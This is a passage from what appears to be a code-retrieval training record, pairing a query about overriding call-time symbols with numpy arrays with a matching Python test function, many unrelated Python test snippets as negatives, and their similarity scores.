**kwargs)\n\t\telif self.operator == '-':\n\t\t\treturn self.subtract(*args, **kwargs)\n\t\telif self.operator == '*':\n\t\t\treturn self.multiple(*args, **kwargs)\n\t\telif self.operator == '/':\n\t\t\treturn self.division(*args, **kwargs)\n\t\telse:\n\t\t\treturn f'Currently Operator ({operator}) is not Applicable'", "def test_bound_methods():\r\n a = Klass()\r\n b = Klass()\r\n nose.tools.assert_not_equal(filter_args(a.f, [], (1, )),\r\n filter_args(b.f, [], (1, )))", "def __init__(self, op, value):\n self.op = op\n self.value = value", "def test_superApply(self):\n one = t.Action(\"1\")\n x = t.Action(\"x\")\n a = t.Apply(\"super\", \"main\", [one, x])\n self.assertEqual(writePython(a),\n dd(\"\"\"\n _G_python_1, lastError = 1, None\n self.considerError(lastError, None)\n _G_python_2, lastError = eval('x', self.globals, _locals), None\n self.considerError(lastError, None)\n _G_apply_3, lastError = self.superApply(\"main\", _G_python_1, _G_python_2)\n self.considerError(lastError, None)\n _G_apply_3\n \"\"\"))", "def test_map_args_level():\n pass", "def to_op(self):\n raise NotImplementedError", "def test_member_method_inputs(self):\r\n\r\n # test that explicit Method inputs don't use shared storage\r\n M = Module()\r\n M.x = T.dscalar()\r\n M.y = T.dscalar()\r\n M.f = Method([M.x], M.x + M.y)\r\n M.g = Method([M.y], M.x - M.y)\r\n m = M.make()\r\n m.y = 77\r\n assert m.f(23) == 100\r\n assert m.x is None\r\n m.x = 1000\r\n assert m.g(23) == 977\r\n assert m.y == 77\r\n assert m.x == 1000", "def test_missing_args_static_method(a, x, y, z=3, t=1): # noqa: D213, D407", "def test_basic_method_call_wrapper():\n my_method = SGMethod(\"test\")\n other_method = SGMethod(\"other\")\n \n my_method.calls(other_method)\n my_method.check_call_validity();\n \n assert other_method == my_method.method_called\n assert len(my_method.args) == 0", "def test_arguments(self):\n calls = []\n decorator = self.decorator()\n\n @decorator\n def func(a, b, c):\n calls.append((a, b, c))\n\n func(1, 2, c=3)\n self.assertEqual(calls, [(1, 2, 3)])", "def function(self, *args):\n raise NotImplemented", "def __call__(self, *args, **kwargs):\n raise NotImplementedError", "def __call__(self, *args, **kwargs):\n raise NotImplementedError", "def test_param_of_func(self):\n source = \"\"\"\n def foo(x, y):\n return x + y\n \"\"\"\n target = \"\"\"\n def foo(x_new, y_new):\n return x + y\n \"\"\"\n self._check_compatibility(source, target)" ]
[ "0.6805851", "0.6484445", "0.6379259", "0.6364742", "0.6364742", "0.6306603", "0.6228619", "0.61764985", "0.61253047", "0.61219794", "0.6098357", "0.60761136", "0.59945655", "0.5985499", "0.5953652", "0.5947286", "0.59347874", "0.59075207", "0.5906247", "0.590326", "0.5891721", "0.5878505", "0.58742213", "0.5851081", "0.5851081", "0.5851081", "0.5844272", "0.5840465", "0.5819834", "0.5814746", "0.5799022", "0.5775556", "0.5757402", "0.5757166", "0.57456243", "0.57403773", "0.5704036", "0.5700698", "0.5674039", "0.56643814", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5654159", "0.565167", "0.56409127", "0.56376374", "0.56289315", "0.5626796", "0.56235546", "0.5620106", "0.56165016", "0.56159204", "0.5601042", "0.5599311", "0.55936474", "0.55926543", "0.5591661", "0.5581775", "0.55813205", "0.55802697", "0.5578437", "0.55748624", "0.55699486", "0.55697197", "0.5567493", "0.5567493", "0.5567493", "0.5558634", "0.5554938", "0.55542105", "0.5551742", "0.5550034", "0.55480343", "0.5530925", "0.552827", "0.55279964", "0.55264693", "0.5521478", "0.55214643", "0.5521311", "0.55107015", "0.5496168", "0.54961485", "0.5494629", "0.549462", "0.549462", "0.5492618" ]
0.0
-1
Test calltime symbols overrides with other symbols
def test_override_symbol(self): i, j, k, l = dimify('i j k l') a = symbol(name='a', dimensions=(i, j, k, l), value=2.) a1 = symbol(name='a1', dimensions=(i, j, k, l), value=3.) a2 = symbol(name='a2', dimensions=(i, j, k, l), value=4.) op = Operator(Eq(a, a + 3)) op() op(a=a1) op(a=a2) shape = [d.size for d in [i, j, k, l]] assert(np.allclose(a.data, np.zeros(shape) + 5)) assert(np.allclose(a1.data, np.zeros(shape) + 6)) assert(np.allclose(a2.data, np.zeros(shape) + 7))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def testSymbolHash(self):\n gScope = pykd.diaLoadPdb( str(target.module.pdb()) )\n symSet = set([ gScope[\"g_structTest\"], gScope[\"EnumWindowsProc1\"], gScope[\"g_structTest\"] ])\n self.assertEqual( 2, len(symSet) )\n self.assertTrue( gScope[\"g_structTest\"] in symSet )\n self.assertFalse( gScope[\"EnumWindowsProc2\"] in symSet )", "def FakeSymbol(*args, _op, **kwargs):\n return symbol.Custom(*args, _op=_op, op_type=\"_fake\", **kwargs)", "def test_fix_code_typical_code():\r\n\r\n pass", "def test_symbol(self, data, symbol_first, symbol_second):\n layer = Points(data)\n assert layer.symbol == \"disc\"\n\n layer.symbol = symbol_first\n assert layer.symbol == symbol_first\n\n layer = Points(data, symbol=symbol_first)\n assert layer.symbol == symbol_first\n\n layer.symbol = symbol_second\n assert layer.symbol == symbol_second", "def testCtor(self):\n try: pykd.DiaSymbol()\n except RuntimeError: pass", "def execute(self, symbol_table, test_mode=False):", "def execute(self, symbol_table, test_mode=False):", "def test_GetSymbolMapping_no_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\", \"\"]\n self.assertDictEqual({}, stack_utils.GetSymbolMapping(lines))", "def test_GetSymbolMapping_parameter_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo?q=hello at /path/to/myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def test_GetSymbolMapping_multiple_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/myapp.mojo/.lM03ws\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/otherapp.mojo at /path/to/otherapp.mojo/.kW07s\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\",\n \"/path/to/otherapp.mojo/.kW07s\": \"libotherapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def test_GetSymbolMapping_simple_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def enable_named_call():\n global _use_named_call\n _use_named_call = True", "def test_symbol_lookup(self):\r\n\r\n def check_lookup(symbol, expected):\r\n op = BaseWhereOperator.get_operator(symbol)\r\n self.assertEqual(op, expected)\r\n\r\n check_lookup('EQ', EqualsOperator)\r\n check_lookup('IN', InOperator)\r\n check_lookup('GT', GreaterThanOperator)\r\n check_lookup('GTE', GreaterThanOrEqualOperator)\r\n check_lookup('LT', LessThanOperator)\r\n check_lookup('LTE', LessThanOrEqualOperator)", "def stubFunc( *args, **keywords ):\n maya.cmds.dynamicLoad( library )\n # call the real function which has replaced us\n return maya.cmds.__dict__[command]( *args, **keywords )", "def test_patch_pci_switch(self):\n pass", "def run(self, *args, **kw):\n if kw.has_key('SYMROOT'):\n del kw['SYMROOT']\n super(TestGypBase, self).run(*args, **kw)", "def test_symbol_lookup(self):\n\n def check_lookup(symbol, expected):\n op = BaseWhereOperator.get_operator(symbol)\n self.assertEqual(op, expected)\n\n check_lookup('EQ', EqualsOperator)\n check_lookup('IN', InOperator)\n check_lookup('GT', GreaterThanOperator)\n check_lookup('GTE', GreaterThanOrEqualOperator)\n check_lookup('LT', LessThanOperator)\n check_lookup('LTE', LessThanOrEqualOperator)", "def test_override_builtin(self):\n PyLoader.register(override_builtins=True)\n self.assertIs(PRIORITY_HOOKS['.py'], PyLoader)", "def test_stub(self):\n pass", "def test_patch_none():", "def test_patch_bios_unit(self):\n pass", "def test_keyword(self):\n varargs = ()\n kwargs = {'default' : 12}\n method = getattr(self.foo,'f_default')\n var_dict = reassign_function_arguments(method, varargs, kwargs)\n self.assert_(var_dict['default'] == 12)\n self.assert_(len(var_dict) == 1)", "def test_010(self):\n caller = self.get_caller([SingleMethod])\n self.assertEqual(\"I have very little to say.\", caller())", "def __call__(fun_name):", "def setUp(self):\n self.Triton = TritonContext()\n self.Triton.setArchitecture(ARCH.X86_64)\n self.Triton.setMode(MODE.ONLY_ON_SYMBOLIZED, True)\n super(TestSymbolicEngineOnlySymbolized, self).setUp()", "def symbols(self):\n pass", "def test_GetSymbolMapping_normalize(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/.//myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def compilation_test(interp, source):\r\n print '*** Compiling symbols from file: %s ***' % util.within_VCode(source)\r\n interp.cleanup_dictionary()\r\n interp.parse_symbols_from_file(source)\r\n print '\\n\\nParsed symbols are: '\r\n interp.print_symbols()\r\n print 'Unresolved abbreviations are:'\r\n unresolved = interp.peek_at_unresolved()\r\n sorted_unresolved = unresolved.keys()\r\n sorted_unresolved.sort()\r\n for an_abbreviation in sorted_unresolved:\r\n symbol_list = unresolved[an_abbreviation].keys()\r\n symbol_list.sort()\r\n print '\\'%s\\': appears in %s' % (an_abbreviation, str(symbol_list))\r\n \r\n print '\\n*** End of compilation test ***\\n'", "def assert_structural_equal_ignore_global_symbol(\n func1: PrimFunc,\n func2: PrimFunc,\n *args: Any,\n **kwargs: Any,\n) -> None:\n assert_structural_equal(\n func1.with_attr(\"global_symbol\", \"main\"),\n func2.with_attr(\"global_symbol\", \"main\"),\n *args,\n **kwargs,\n )", "def test_override_builtin_extension_without_explicit_flag(self):\n with self.assertRaises(ValueError):\n PyLoader.register()", "def test_call(self):\r\n self.assertEqual(self.cs(), {})", "def test_main_gc_1(test):\n answers = (i for i in (test, 'b', 'q'))\n with mock.patch.object(builtins, 'input', lambda _: next(answers)):\n g_c.main()", "def test_func_base(self):\n cmd = \"x/s $_base()\"\n self.assertFailIfInactiveSession(gdb_run_cmd(cmd))\n res = gdb_start_silent_cmd(cmd)\n self.assertNoException(res)\n self.assertIn(\"\\\\177ELF\", res)\n addr = res.splitlines()[-1].split()[0][:-1]\n\n cmd = \"x/s $_base(\\\"libc\\\")\"\n res = gdb_start_silent_cmd(cmd)\n self.assertNoException(res)\n self.assertIn(\"\\\\177ELF\", res)\n addr2 = res.splitlines()[-1].split()[0][:-1]\n self.assertNotEqual(addr, addr2)", "def test_method(self, test, another_test, _): # noqa: D213, D407", "def test_func_dict_not_imported_module():\n\n plot_toggles = {\"SMF\": True}\n module_name = \"not_a_module.funcs\"\n function_prefix = \"calc_\"\n\n with pytest.raises(KeyError):\n func_dict = generate_func_dict(plot_toggles, module_name, function_prefix)", "def test(): # TO BE DELETED WHEN PROGRAM COMPLETED\n print('methode test')", "def test_method(self):\n self.assertEqual(self.method, 'modified strong collision')", "def test_10_detect(self):\n for backend, spec in subtests.items():\n with self.subTest(backend=backend):\n e.Ty(spec[\"launch\"], delay=1)\n e.Ty(spec[\"break_main\"])\n e.Ty('run\\n', delay=1)\n\n cur, breaks = e.GetSigns()\n self.assertEqual('test.cpp:17', cur)\n self.assertEqual([17], breaks)\n\n e.In('<esc>')\n e.In('ZZ')", "def test_inherent_instance_method() -> None:\n assert lmp.tknzr._bpe.BPETknzr.dec == BaseTknzr.dec\n assert lmp.tknzr._bpe.BPETknzr.enc == BaseTknzr.enc\n assert lmp.tknzr._bpe.BPETknzr.norm == BaseTknzr.norm\n assert lmp.tknzr._bpe.BPETknzr.pad_to_max == BaseTknzr.pad_to_max\n assert lmp.tknzr._bpe.BPETknzr.vocab_size == BaseTknzr.vocab_size", "def do_calltip(self):\n if self.debug:\n print >>sys.__stdout__, \"do_calltip\"\n separators = re.compile('[\\s\\{\\}\\[\\]\\(\\)\\= ,:]')\n symbol = self.input_buffer\n symbol_string = separators.split(symbol)[-1]\n base_symbol_string = symbol_string.split('.')[0]\n if base_symbol_string in self.shell.user_ns:\n symbol = self.shell.user_ns[base_symbol_string]\n elif base_symbol_string in self.shell.user_global_ns:\n symbol = self.shell.user_global_ns[base_symbol_string]\n elif base_symbol_string in __builtin__.__dict__:\n symbol = __builtin__.__dict__[base_symbol_string]\n else:\n return False\n try:\n for name in symbol_string.split('.')[1:] + ['__doc__']:\n symbol = getattr(symbol, name)\n self.AutoCompCancel()\n # Check that the symbol can indeed be converted to a string:\n symbol += ''\n wx.CallAfter(self.CallTipShow, self.GetCurrentPos(), symbol)\n except:\n # The retrieve symbol couldn't be converted to a string\n pass", "def disable_named_call():\n global _use_named_call\n _use_named_call = False", "def test_2(self):\n event = MockEvent(u\"%run aa\")\n mockself = None\n match = set(magic_run_completer(mockself, event))\n self.assertEqual(match, set([u\"aaø.py\"]))", "def test_main_gc_2(test):\n answers = (i for i in (test, '1 1 1 1', 'q'))\n with mock.patch.object(builtins, 'input', lambda _: next(answers)):\n g_c.main()", "def test_compiler_arguments_not_execute(patch, compiler, lines, tree):\n patch.init(StorySyntaxError)\n patch.object(Objects, 'arguments')\n lines.last.return_value = '1'\n lines.lines = {'1': {'method': 'whatever'}}\n with raises(StorySyntaxError):\n compiler.arguments(tree, '0')\n error = 'arguments_noservice'\n StorySyntaxError.__init__.assert_called_with(error, tree=tree)", "def test_rpcCall(self):\n pass", "def test_class_method() -> None:\n assert inspect.signature(lmp.tknzr._bpe.BPETknzr.add_CLI_args) == inspect.signature(BaseTknzr.add_CLI_args)", "def test_smethod_line_explicit_args(self):\n os.environ = BASE_ENVIRON\n self.plugin.init([\"dummy\", \"boom\"])\n for transport, transport_bindaddr in list(self.plugin.getBindAddresses().items()):\n self.plugin.reportMethodSuccess(transport, transport_bindaddr, \"roots=culture,first=fire\")\n self.plugin.reportMethodsEnd()\n\n self.assertIn(\"SMETHOD boom 127.0.0.1:6666 ARGS:roots=culture,first=fire\\n\", self.getOutputLines())", "def test_syntax(self):\n\t\ttheResult = False\n\t\ttry:\n\t\t\tfrom .context import code\n\t\t\tfrom code import restart_service\n\t\t\ttheResult = True\n\t\texcept Exception:\n\t\t\ttheResult = False\n\t\tassert theResult", "def __init__(self):\r\n self.s_table = SymbolTable.preSymbols", "def dummy_method_silent(self):\n\n pass", "def test_calls(self):\n ex = self.ex\n m = self.m\n n = self.n\n\n nreps = random.randint(1, 10)\n ex.nreps = nreps\n ex.vary[\"X\"][\"with\"].add(\"rep\")\n ex.infer_lds()\n\n cmds = ex.generate_cmds()\n\n idx = random.randint(0, nreps - 1)\n self.assertIn([\"name\", m, n, \"X_%d\" % idx, m, \"Y\", m, \"Z\", n], cmds)", "def test_py_compile_condition(self):\n self._test_py_compile('coin')", "def test_no_matching_method(self):\n self.cook_obj.prepare_chapati(4)\n self.assertEquals(sys.stdout.getvalue().strip(), \"4 chapatis ready\")", "def test():\n pass", "def dummy_fn(self):\n\t\tpass", "def test_required_methods(self):", "def test_exec_prefix(self):\n self.chck_triple('exec_prefix')", "def _missing_symbol_to_skipped_tests(self):\n return {\n \"MathMLElement\": [\"mathml\"],\n \"GraphicsLayer\": [\"compositing\"],\n \"WebCoreHas3DRendering\": [\"animations/3d\", \"transforms/3d\"],\n \"WebGLShader\": [\"fast/canvas/webgl\", \"compositing/webgl\", \"http/tests/canvas/webgl\"],\n \"MHTMLArchive\": [\"mhtml\"],\n }", "def test_2(self):\n event = MockEvent(u\"%run aa\")\n mockself = None\n match = set(magic_run_completer(mockself, event))\n self.assertEqual(match, set([u\"aao.py\"]))", "def test_turtle(self):\n assert not inspection.is_fixture_method(DummyTestCase.turtle_method)", "def test_03_visit_special(self):", "def test_two_instmaps_different(self):\n instmap1 = FakeAthens().defaults().instruction_schedule_map\n instmap2 = copy.deepcopy(instmap1)\n\n # override one of instruction\n instmap2.add(\"sx\", (0,), Schedule())\n\n self.assertNotEqual(instmap1, instmap2)", "def test_notCalledInDefault(self):\n us = WeirdCallableOptions()\n argV = []\n us.parseOptions(argV)", "def _test(self):", "def _test(self):", "def _test(self):", "def _test(self):", "def _test(self):", "def test_no_shadowed_builtins(command_name, command_table, builtins):\n errors = []\n for sub_name, sub_command in command_table.items():\n op_help = sub_command.create_help_command()\n arg_table = op_help.arg_table\n for arg_name in arg_table:\n if any(p.startswith(arg_name) for p in builtins):\n # Then we are shadowing or prefixing a top level argument\n errors.append(\n 'Shadowing/Prefixing a top level option: '\n '%s.%s.%s' % (command_name, sub_name, arg_name))\n if errors:\n raise AssertionError('\\n' + '\\n'.join(errors))", "def testinternfunc(self):\n\t\treturn describeInterface(self)", "def test_man9ext(self):\n self.chck_triple('man9ext')", "def test_method(self, test, another_test, z, _, x=1, y=2, _private_arg=1): # noqa: D213, D407", "def test():\r\n pass", "def _test(self):\n pass", "def _test(self):\n pass", "def _test(self):\n pass", "def test_with_hook_init_param(self):\n class h_dup(funhook.Hook):\n def __init__(self, n):\n super(h_dup, self).__init__(n)\n self.accept_kwargs = False\n self.accept_pos_args = True\n self.accept_ret = False\n\n self._n = n\n\n def before(self, bnd, n):\n return (n+self._n, )\n\n\n class cls_pp(object):\n @funhook.attach_([h_dup(501)])\n def func(self, n):\n return n+1\n\n class cls_p1(cls_pp):\n pass\n\n class cls_p2(cls_pp):\n pass\n\n @funhook.setup_([adapt_hook_from()]) \n class cls_chd(cls_p1, cls_p2):\n def func(self, n):\n return n-1\n\n self.assertEqual(cls_pp().func(1), 503)\n self.assertEqual(cls_chd().func(1), 501)", "def dummy(self):\n pass", "def test_dummy():", "def test_main_gc_3(test):\n with mock.patch.object(builtins, 'input', lambda _: test):\n g_c.main()", "def _test(self, c):\n\treturn self.UNRESOLVED\t\t# Placeholder", "def __init__(self, symbols):\r\n self.symbols = set(symbols)", "def test_basic_method_call_wrapper():\n my_method = SGMethod(\"test\")\n other_method = SGMethod(\"other\")\n \n my_method.calls(other_method)\n my_method.check_call_validity();\n \n assert other_method == my_method.method_called\n assert len(my_method.args) == 0", "def test_issue_55():\n\n # full name change including stack trace\n\n @with_signature('bar()')\n def foo():\n return 'a'\n\n assert \"bar at\" in repr(foo)\n assert foo.__name__ == 'bar'\n assert foo() == 'a'\n\n # only metadata change\n\n @with_signature(None, func_name='bar')\n def foo():\n return 'a'\n\n if sys.version_info >= (3, 0):\n assert \"foo at\" in repr(foo)\n assert foo.__name__ == 'bar'\n assert foo() == 'a'", "def substitude_symbols(self, f):\n pass", "def test_change_name_of_the_devicefalse():", "def true(symbol):\n return True", "def test_1(self):\n event = MockEvent(u\"%run a\")\n mockself = None\n match = set(magic_run_completer(mockself, event))\n self.assertEqual(match, set([u\"a.py\", u\"aaø.py\"]))", "def before_test(self, func, *args, **kwargs):\n pass", "def test_same_class_method_name_different_class(self):\n self.apple.add_sweet_letter(self.cherry)\n apple_add_sweet_cherry_key = get_function_cache_key('class_method', 'tests.Fruit.add_sweet_letter',\n (self.apple, self.cherry), {})\n self.assertExpectedKeyInCache(apple_add_sweet_cherry_key)\n\n self.celery.add_sweet_letter(self.cherry)\n celery_add_sweet_cherry_key = get_function_cache_key('class_method', 'tests.Vegetable.add_sweet_letter',\n (self.celery, self.cherry), {})\n self.assertExpectedKeyInCache(celery_add_sweet_cherry_key)\n\n self.assertNotEqual(apple_add_sweet_cherry_key, celery_add_sweet_cherry_key)", "def test_name_and_keyword_arguments(self):\n mock_call = Call(\"some_name\", a=1024, b=3.1415, c=\"hello\")\n assert_that(str(mock_call), equal_to(\"Call(some_name, a=1024, b=3.1415, c=hello)\"))", "def test_3(self):\n event = MockEvent(u'%run \"a')\n mockself = None\n match = set(magic_run_completer(mockself, event))\n self.assertEqual(match, set([u\"a.py\", u\"aaø.py\"]))", "def stub_out(self, old, new):\n self.useFixture(fixtures.MonkeyPatch(old, new))", "def stub_out(self, old, new):\n self.useFixture(fixtures.MonkeyPatch(old, new))", "def test_change_name_of_the_devicetrue():", "def test_cli_fix():\n assert Cli is Cl", "def test_syntax_error_nested_symbol_table():\n reader = get_reader(\n \"\"\"\nmodule my_mod\ncontains\nFUNCTION dot_v_mod_2d( )\n REAL :: dot_v_mod_2d\n REAL, DIMENSION(:,:), POINTER, CONTIOUS :: z_msk_i\n dot_v_mod_2d = 0.0_wp\nEND FUNCTION dot_v_mod_2d\nend module my_mod\n\"\"\"\n )\n result = F2003.Module.match(reader)\n # There should be no match and, as a result, there should be no\n # symbol-table entries.\n assert result is None\n assert SYMBOL_TABLES._symbol_tables == {}", "def test_call_interface_twice(self, monkeypatch, data):\n monkeypatch.delenv(\"ORION_RESULTS_PATH\", raising=False)\n reloaded_client = reload(cli)\n\n reloaded_client.report_results(data)\n with pytest.raises(RuntimeWarning) as exc:\n reloaded_client.report_results(data)\n\n assert \"already reported\" in str(exc.value)\n assert reloaded_client.IS_ORION_ON is False\n assert reloaded_client.RESULTS_FILENAME is None\n assert reloaded_client._HAS_REPORTED_RESULTS is True", "def test_new_method_appendded():\n expected = True\n actual = \"breadth_first\" in dir(Graph)\n assert expected ==actual", "def test_symbol():\n token = Token(\"+\", TokenInfo(\"<stdin>\", 0, 1, \" ++\"))\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"+\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.ADD\n assert token.info.line == \" ++\"\n\n token = token()\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"+\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.ADD\n assert token.info.line == \" ++\"\n\n token += \"+\"\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"++\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.INC\n assert token.info.line == \" ++\"\n\n token = token()\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"++\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.INC\n assert token.info.line == \" ++\"\n\n with pytest.raises(LythSyntaxError) as err:\n token += \"5\"\n\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"++\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.INC\n assert token.info.line == \" ++\"\n\n assert err.value.msg is LythError.MISSING_SPACE_AFTER_OPERATOR\n assert err.value.filename == \"<stdin>\"\n assert err.value.lineno == 0\n assert err.value.offset == 1\n assert err.value.line == \" ++\"\n\n assert repr(token) == \"Token(INC, '++', 0, 1)\"\n assert str(token) == \"INC: '++'\"" ]
[ "0.6088717", "0.5891969", "0.586841", "0.57884955", "0.57511026", "0.5713668", "0.5713668", "0.57010543", "0.5664404", "0.5631575", "0.5563887", "0.55595315", "0.55191725", "0.5508196", "0.54970926", "0.54917103", "0.5480295", "0.54737866", "0.5444322", "0.54287255", "0.54046744", "0.54034895", "0.53810966", "0.5379911", "0.5378213", "0.5367286", "0.53602266", "0.53591675", "0.535334", "0.53306067", "0.5319235", "0.5300812", "0.527999", "0.5279129", "0.52712923", "0.52664727", "0.5263024", "0.52600914", "0.5258226", "0.52566737", "0.5237043", "0.522917", "0.5220641", "0.5220635", "0.52066624", "0.5203421", "0.5202695", "0.5188272", "0.5184048", "0.5181643", "0.51728135", "0.51700836", "0.5167556", "0.516711", "0.5152917", "0.51508874", "0.5150196", "0.51345086", "0.51282895", "0.5128044", "0.5125645", "0.510673", "0.50962883", "0.50938916", "0.50938916", "0.50938916", "0.50938916", "0.50938916", "0.5092863", "0.5090393", "0.5086653", "0.5085216", "0.5082062", "0.5076482", "0.5076482", "0.5076482", "0.5071251", "0.50702786", "0.50578076", "0.50457036", "0.50437814", "0.5040636", "0.5037564", "0.5034143", "0.50310576", "0.5028927", "0.5018587", "0.5014687", "0.5013695", "0.5008245", "0.5002571", "0.49975175", "0.4996194", "0.4996194", "0.49905857", "0.49890167", "0.49854016", "0.49830416", "0.49826092", "0.49784058" ]
0.58977205
1
Test calltime symbols overrides with numpy arrays
def test_override_array(self): i, j, k, l = dimify('i j k l') shape = tuple(d.size for d in (i, j, k, l)) a = symbol(name='a', dimensions=(i, j, k, l), value=2.) a1 = np.zeros(shape=shape, dtype=np.float32) + 3. a2 = np.zeros(shape=shape, dtype=np.float32) + 4. op = Operator(Eq(a, a + 3)) op() op(a=a1) op(a=a2) shape = [d.size for d in [i, j, k, l]] assert(np.allclose(a.data, np.zeros(shape) + 5)) assert(np.allclose(a1, np.zeros(shape) + 6)) assert(np.allclose(a2, np.zeros(shape) + 7))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_TimeArray_repr():", "def test_format_signature_numpy():", "def test_TimeArray_convert_unit():", "def test_TimeArray_copyflag():\r\n\r\n #These two should both generate a TimeArray, with one picosecond.\r\n #This one holds time_unit='s'\r\n t1 = ts.TimeArray(np.array([1], dtype=np.int64), copy=False)\r\n #This one holds time_unit='ps':\r\n t2 = ts.TimeArray(1, time_unit='ps')\r\n t3 = ts.TimeArray(t2, copy=False)\r\n npt.assert_equal(t1, t2)\r\n npt.assert_equal(t2.ctypes.data, t3.ctypes.data)", "def test_test_arraypointertype(self):\n input = \"\"\"\n void main () {\n float arr[3];\n arr[2]=1.5;\n foo(arr);\n arr[2] = foo(arr)[2] + 1.1;\n putFloatLn(arr[2]);\n }\n float[] foo(float x[]){\n x[2] = 5.1;\n return x;\n }\n \"\"\"\n expect = \"6.2\\n\"\n self.assertTrue(TestCodeGen.test(input,expect,571))", "def test_isarray_gtiff(self):\n self.assertIsInstance(_test_array(landsat_gtiff), np.ndarray)", "def test_isarray_vrt(self):\n self.assertIsInstance(_test_array(landsat_vrt), np.ndarray)", "def test_numpy_arrays_not_copied(self):\n with PhysicsEngineHarness('tests/engineering-test.json') as physics_engine:\n state = physics_engine.get_state()\n\n engineering = state.engineering\n engineering.components[0].temperature = 777777.7\n self.assertEqual(engineering._array[2 * N_COMPONENTS], 777777.7)\n self.assertEqual(state.y0()[state.ENGINEERING_START_INDEX + 2 * N_COMPONENTS], 777777.7)", "def lookup_array(self, *args, **kwargs): # real signature unknown\n pass", "def lookup_array(self, *args, **kwargs): # real signature unknown\n pass", "def test_numpy_ops(self):\n\n arr = np.array([1, 2, 3])\n c = Column('a', arr)\n eq = c == arr\n assert np.all(eq)\n assert len(eq) == 3\n assert type(eq) == Column\n assert eq.dtype.str == '|b1'\n eq = arr == c\n assert np.all(eq)\n\n lt = c - 1 < arr\n assert np.all(lt)", "def test_Sobol_G_raises_error_if_values_not_numpy_array():\n fixture = [list(range(8)), str(12345678)]\n for x in fixture:\n evaluate(x)", "def test_equal15():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = x\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test11(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), bcolz.carray(b)\n if self.vm == \"python\":\n cr = bcolz.eval(\"np.sin(c) + 2 * np.log(d) - 3\")\n elif self.vm == \"dask\":\n cr = bcolz.eval(\"da.sin(c) + 2 * da.log(d) - 3\")\n else:\n cr = bcolz.eval(\"sin(c) + 2 * log(d) - 3\")\n nr = np.sin(a) + 2 * np.log(b) - 3\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_allclose(cr[:], nr, err_msg=\"eval does not work correctly\")", "def test_reference_to_array(self):\n arr = numpy.arange(0.0, 10.0, 0.1)\n arr = numpy.reshape(arr, (25, 4))\n vtk_arr = array_handler.array2vtk(arr)\n arr1 = array_handler.vtk2array(vtk_arr)\n # Now make sure these are using the same memory.\n arr[0][0] = 100.0\n self.assertEqual(arr[0][0], arr1[0][0])\n self.assertEqual(arr.shape, arr1.shape)", "def test02(self):\n a = np.arange(3, self.N, 4)\n ac = bcolz.arange(3, self.N, 4, rootdir=self.rootdir)\n self.assertTrue(np.all(a == ac))", "def test_timearray_var_prod():\r\n a = ts.TimeArray(list(range(10)))\r\n npt.assert_raises(NotImplementedError, a.var)\r\n npt.assert_raises(NotImplementedError, a.prod)", "def test_equitability(self):\n c = array([5])\n self.assertFloatEqual(equitability(c), 0)\n c = array([5,5])\n self.assertFloatEqual(equitability(c), 1)\n c = array([1,1,1,1,0])\n self.assertEqual(equitability(c), 1)", "def test00(self):\n a = np.arange(self.N)\n ac = bcolz.arange(self.N, rootdir=self.rootdir)\n self.assertTrue(np.all(a == ac))", "def test_operation_arg_array(self, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\"float array A =\\n\\t1, 5\\nGaussian(means=A) | 0\\n\")\n assert np.all(bb.operations[0][\"kwargs\"][\"means\"] == np.array([[1, 5]]))", "def with_numpy(func):\r\n return func", "def _test1():\n 